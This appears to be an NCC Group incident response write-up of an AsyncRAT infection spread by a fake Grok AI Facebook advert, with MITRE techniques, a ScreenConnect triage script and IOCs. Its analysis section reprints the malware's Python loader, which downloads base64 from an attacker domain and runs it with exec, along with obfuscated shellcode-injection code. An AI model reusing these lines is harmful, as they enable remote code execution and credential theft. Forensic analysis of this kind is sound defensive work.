Tldr;
This post will delve into a recent incident response engagement handled by NCC Group’s Digital Forensics and Incident Response (DFIR) team, involving AsyncRAT.
Below is a summary of the findings presented in this blog post:
- Initial access via a drive by compromise
- Use of ScreenConnect for persistence and file transfers
- Credential Harvesting via AsyncRAT
Incident Overview
The Threat Actor created a malicious advert on Facebook which the affected user clicked. This led to the execution of ScreenConnect disguised as a Grok AI creation.
Files were transferred to the host using ScreenConnect; one of these files was AsyncRAT. This was a single-host attack; however, browser data was collected and keystrokes were recorded, both of which were likely exfiltrated by the Threat Actor.
Timeline
T + 0 days – Malicious advert clicked
T + 1 minute – New ScreenConnect service installed
T + 1 day – AsyncRAT transferred and executed on host
T + 4 days – Creation of browser data zip
T + 6 days – Recorded keystrokes log file created
MITRE TTPs
Resource Development
T1583.008 – Acquire Infrastructure: Malvertising
The Threat Actor had created a malicious advert on Facebook which included the malicious domain canvadreamlab[.]xyz.
The origin URL is hxxps://shortenworld[.]com/branded-domain/canvadreamlab.xyz, which utilises the URL shortener Shorten World.
Initial Access
T1189 – Drive by Compromise
The user downloaded a file from hxxps://openaigrok[.]com, after clicking on a Facebook paid advert.
hxxps://l.facebook[.]com/l.php?u=http%3A%2F%2Fcanvadreamlab.xyz%2Fai%3Futm_medium%3Dpaid%26utm_source…
Execution
T1204.002 – User Execution: Malicious File
The user downloaded the following file:
C:\Users\<USER>\Downloads\Creation_Made_By_GrokAI.mp4 OpenAI.com
Subsequently, the executable recorded in the prefetch file C:\Windows\Prefetch\CREATION_MADE_BY_GROKAI.MP4 -3F3E21F6.pf invoked a ScreenConnect Windows Installer package, which was installed on the host from C:\Users\<USER>\AppData\Local\Temp\ScreenConnect\24.4.4.9118\aeef6885fa9229dd\ScreenConnect.ClientSetup.msi.
T1569.002 – System Services: Service Execution
The Threat Actor installed a new ScreenConnect service.
{"EventData":{"Data":[{"@Name":"ServiceName","#text":"ScreenConnect Client (aeef6885fa9229dd)"},{"@Name":"ImagePath","#text":"\"C:\\Program Files (x86)\\ScreenConnect Client (aeef6885fa9229dd)\\ScreenConnect.ClientService.exe\" \"?e=Access&y=Guest&h=jtsec.innocreed.com
…
{"@Name":"StartType","#text":"autostart"},{"@Name":"AccountName","#text":"LocalSystem"}]}}
The domain associated with this service installation was jtsec.innocreed[.]com. The ScreenConnect user configuration file also contained the IP address 194.26.192[.]107.
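As an added example (not part of the NCC Group write-up), the following Python flattens a service-install event exported in the EventData JSON shape shown above, extracts the ScreenConnect relay host from the h= parameter in the ImagePath and flags an install whose relay is not one the organisation runs. The event record and the approved relay list are constructed here; the record reuses the page's ImagePath with its truncated argument string completed.

```python
import json
import re
from typing import Optional
from urllib.parse import parse_qs

# Constructed record in the EventData shape quoted above; the relay host is the one
# from the incident, the closing quote of the argument string is completed here.
SAMPLE_EVENT = json.dumps({"EventData": {"Data": [
    {"@Name": "ServiceName", "#text": "ScreenConnect Client (aeef6885fa9229dd)"},
    {"@Name": "ImagePath", "#text": '"C:\\Program Files (x86)\\ScreenConnect Client (aeef6885fa9229dd)'
                                    '\\ScreenConnect.ClientService.exe" "?e=Access&y=Guest&h=jtsec.innocreed.com"'},
    {"@Name": "StartType", "#text": "autostart"},
    {"@Name": "AccountName", "#text": "LocalSystem"},
]}})

# Relay host(s) the organisation's own ScreenConnect deployment uses (assumed value).
APPROVED_RELAYS = {"screenconnect.corp.example"}


def event_fields(event_json: str) -> dict:
    """Flatten the EventData array into a name -> text dictionary."""
    doc = json.loads(event_json)
    return {d["@Name"]: d.get("#text", "") for d in doc["EventData"]["Data"]}


def screenconnect_relay(image_path: str) -> Optional[str]:
    """Return the relay host (h= parameter) from a ScreenConnect client ImagePath, else None."""
    if "screenconnect.clientservice.exe" not in image_path.lower():
        return None
    # The client is launched with a quoted query string after the executable path.
    m = re.search(r'"\?([^"]*)"', image_path)
    if not m:
        return None
    host = parse_qs(m.group(1)).get("h", [None])[0]
    return host.lower() if host else None


def triage_service_install(event_json: str, approved=APPROVED_RELAYS) -> dict:
    """Summarise a service-install event and flag ScreenConnect relays not on the allowlist."""
    fields = event_fields(event_json)
    relay = screenconnect_relay(fields.get("ImagePath", ""))
    return {
        "service": fields.get("ServiceName"),
        "account": fields.get("AccountName"),
        "autostart": fields.get("StartType") == "autostart",
        "relay": relay,
        "suspicious": relay is not None and relay not in approved,
    }
```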
T1059.006 – Command and Scripting Interpreter: Python
The C:\xmetavip folder was created, along with 4 files within it: 9f.bat, vcruntime140.dll, python310.dll and pw.exe.
Persistence
T1547.001 – Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder
powershell.exe was used to create a new property on a registry key and set its value. The key was HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run and the value was C:\xmetavip\9f.bat, meaning 9f.bat ran every time the user logged in.
Defence Evasion
T1218.005 – System Binary Proxy Execution: Mshta
Execution of mshta.exe, evidenced by the prefetch file C:\Windows\Prefetch\MSHTA.EXE-5D4FFD8E.pf, was followed by the creation of the folder C:\xmetavip on the affected host.
T1406 – Obfuscated Files or Information
The file 9f.bat was heavily obfuscated, an attempt by the Threat Actor to make analysis of the file more difficult. The base64.b64decode function was used in one of the payloads associated with 9f.bat, indicating that the Threat Actor had used base64 encoding.
Credential Access
T1056.001 – Input Capture: Keylogging
The file C:\Users\<USER>\AppData\Local\Temp\Log.tmp was created. When examined, this log contained recorded keystrokes. Analysis of the 9f.bat file identified the final payload as AsyncRAT, which has keylogging capabilities.
Collection
T1560 – Archive Collected Data
The file C:\Users\<USER>\AppData\Local\Temp\[REDACTED]\REDACTED.zip was created on the host. The zip file contained the following folders and files, which largely consisted of browser data such as login credentials and cookies:
- AutoFills (Chrome_Default.txt, Chrome_Profile 1.txt, Edge_Default.txt)
- Cookies Browser (Chrome_Default.txt, Chrome_Profile 1.txt, Edge_Default.txt)
- Google Chrome Token (Chrome_Profile 1.txt)
- All Passwords.txt
- Facebook_Cookies.txt
- Word_List.txt
Command and Control
T1219 – Remote Access Software
The Threat Actor utilised the remote access application ScreenConnect. The ScreenConnect user configuration file contained the jtsec.innocreed[.]com domain and 194.26.192[.]107 IP address.
The Threat Actor utilised the file transfer feature of this application. The files transferred can be seen below:
- xDone.bat
- X-METAPURE_crypted.bat
- 0718x.bat
None of these files were on disk at the time of the investigation so their exact purpose is unknown.
AsyncRAT
The files 9f.bat, vcruntime140.dll, python310.dll and pw.exe, likely transferred via ScreenConnect, resided on the host at the time of analysis and were further investigated.
It was identified that pw.exe was the legitimate Python interpreter and the above DLL files belonged to pw.exe. However, 9f.bat was malicious.
When 9f.bat was executed, it used Mshta, the Windows utility designed to execute script code. The Threat Actor also leveraged Chcp, the Windows utility that changes the active console code page; this was observed through the prefetch file C:\Windows\Prefetch\CHCP.COM-2CF9B15C.pf.
Command Prompt was then used to execute C:\xmetavip\pw.exe, which imported base64-encoded code:
import urllib.request;import base64;exec(base64.b64decode(urllib.request.urlopen('https://authenticate-meta.com/purelogbank2').read().decode('utf-8')))
When decoded, this revealed the URL hxxps://authenticate-meta[.]com/purelogbank2. The content hosted at this URL was a large amount of base64.
The payload from this URL contained obfuscated Python code. It likely downloaded extra payloads and executed these in memory. The code below indicates the use of the kernel32.RtlMoveMemory function [1].
buf = base64.b64decode(urllib.request.urlopen((lambda : (lambda : (lambda : R_E_D__A_V____(______________R_E_D__A_V______________(R_E_D__A_V______________(R_E_D__A_V____ ___________, [(lambda : R_E_D__A_V(b'R_E_D__A_V__\xffyg'))(), (lambda : R_E_D__A_V(b'R_E_D__A_V__\xffys'))(), (lambda : R_E_D__A_V(b'R_E_D__A_V__\xffys'))(), (lambda : ... ()).read().decode((lambda : (lambda : (lambda : R_E_D__A_V____(______________R_E_D__A_V______________(R_E_D__A_V______________(R_E_D__A_V____ ___________, [(lambda : R_E_D__A_V(b'R_E_D__A_V__\xffyt'))(), (lambda : R_E_D__A_V(b'R_E_D__A_V__\xffys'))(), (lambda : R_E_D__A_V(b'R_E_D__A_V__\xffye'))(), (lambda : R_E_D__A_V(b'R_E_D__A_V__\xffy,'))(), (lambda : R_E_D__A_V(b'R_E_D__A_V__\xffy7')) ()]))))())())()))
memAddr = kernel32.VirtualAlloc(None, len(buf), (lambda : R_E_D__A_V(b'R_E_D__A_V__0\x00'))(), (lambda : R_E_D__A_V(b'R_E_D__A_V__@')) ())
kernel32.RtlMoveMemory(memAddr, buf, len(buf))
th = kernel32.CreateThread(ctypes.c_int((lambda : R_E_D__A_V(b'R_E_D__A_V__')) ()), ctypes.c_int((lambda : R_E_D__A_V(b'R_E_D__A_V__'))()), ctypes.c_void_p(memAddr), ctypes.c_int((lambda : R_E_D__A_V(b'R_E_D__A_V__')) ()), ctypes.c_int((lambda : R_E_D__A_V(b'R_E_D__A_V__'))()), ctypes.pointer(ctypes.c_int((lambda : R_E_D__A_V(b'R_E_D__A_V__'))())))
kernel32.WaitForSingleObject(th, -(lambda : R_E_D__A_V(b'R_E_D__A_V__\x01'))())
The 9f.bat file pulls in the purelogbank2 Python script, which then downloads the next payload, Isrgorpev22.b64, and from there the remaining stages continue. The Isrgorpev22.b64 file was identified as shellcode, a small piece of executable code used as a payload to carry out malicious commands. The shellcode decrypts .NET shellcode, which is loaded by the Donut loader [2]. Donut is a loader that enables in-memory execution of VBScript, JScript, EXE and DLL files and .NET assemblies.
The final payload is an obfuscated .NET executable (derived from the shellcode) and was identified as AsyncRAT with C2 capabilities. The final payload connects to 185.149.232[.]197:56001 over SSL.
Recommendations
- Plaintext passwords were identified on the affected host. User awareness training is vital to ensure users understand the risks of storing passwords on devices. Providing alternative solutions, such as a password manager to which access is logged, is advised.
- Disable Autofill in browsers. The affected user had AutoFill enabled which meant the Threat Actor was able to harvest their personal details easily.
IOCs
Value | Type | Comment |
---|---|---|
canvadreamlab[.]xyz | Domain | Facebook advert URL |
jtsec.innocreed[.]com | Domain | ScreenConnect user configuration |
authenticate-meta[.]com | Domain | Linked to 9f.bat |
194.26.192[.]107 | IP | ScreenConnect user configuration |
openaigrok[.]com | Domain | Fake domain |
9248D6CC80B61F3FE0B9D280B86A3AEFF2AA73F0 | Hash | SHA1 hash for 9f.bat |
723d51af347d333f89a6213714ef6540520a55c9 | Hash | SHA1 hash for ScreenConnect executable |
185.149.232[.]197:56001 | IP:Port | Final payload C2 linked to 9f.bat |
References
[1] https://www.forcepoint.com/blog/x-labs/asyncrat-reloaded-python-trycloudflare-malware